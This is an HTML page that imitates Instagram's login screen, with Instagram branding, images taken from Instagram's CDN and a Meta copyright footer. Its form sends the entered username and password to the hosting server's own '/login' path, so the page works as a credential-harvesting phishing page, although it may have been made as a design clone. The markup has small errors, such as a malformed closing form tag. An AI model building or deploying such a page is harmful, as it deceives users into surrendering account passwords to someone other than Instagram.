

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Instagram</title>
    <link rel="stylesheet" href="/style.css" />
    <link
      rel="shortcut icon"
      href="./image/ig_icon.png"
      type="image/x-icon"
    />
    

  </head>

  <body>
    <div class="container">
      <div class="image-container">
        <img src="/image/phone.png" alt="phone" />
      </div>
      <!-- ########################### -->
      <form action="/login" method="POST">
      <div class="form-container">
        <div class="card">
          <img
            class="logo"
            src="./image/instagram.png"
            alt="logo instagram"
          />
          <input
            type="text"
            class="input-form"
            name="username"
            placeholder="Phone number, username, or email"
            autocomplete="off"
          />
          <input
            type="password"
            class="input-form"
            name="password"
            placeholder="Password"
            autocomplete="off"
          />
          <button class="btn-login" type="submit">Log in</button>
          <hr />
          
          <button class="btn-facebook">
            <img src="./image/facebook.png" alt="facebook" />Log in with Facebook
          </button>
          <a href="#" class="btn-forgot-password">Forget password?</a>
        </div>
        <div class="card">
          <p class="register-text">
            Don't have an account? <a href="#" class="regist-link"> Sign up</a>
          </p>
        </div>
        <div class="get-apps">
          <p>Get the  app.</p>
          <a href="#" class="btn_image">
            <img
              src="https://static.cdninstagram.com/rsrc.php/v3/yt/r/Yfc020c87j0.png"
              alt="app store"
              width="140"
            />
          </a>
          <a href="#" class="btn_image">
            <img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" alt="" width="140" />
          </a>
        </div>
      </div>
    </div>
    <form/>
    <footer>
      <div class="footer-link">
        <a href="#">Meta</a>
        <a href="#">Tentang</a>
        <a href="#">Blog</a>
        <a href="#">Pekerjaan</a>
        <a href="#">Bantuan</a>
        <a href="#">API</a>
        <a href="#">Privasi</a>
        <a href="#">Ketentuan</a>
        <a href="#">Akun Teratas</a>
        <a href="#">Tagar</a>
        <a href="#">Lokasi</a>
        <a href="#">Instagram Lite</a>
        <a href="#">Kecantikan</a>
        <a href="#">Tarian</a>
        <a href="#">Kebugaran</a>
        <a href="#">Makanan & Minuman</a>
        <a href="#">Rumah & Taman</a>
        <a href="#">Musik</a>
        <a href="#">Seni Visual</a>
      </div>
      <div class="footer-copyright">
        <select name="language">
          <option value="id">English</option>
          <option value="en">Hindi</option>
        </select>
        <p>&copy; 2024 Instagram from Meta</p>
      </div>
    </footer>
  </body>
</html>
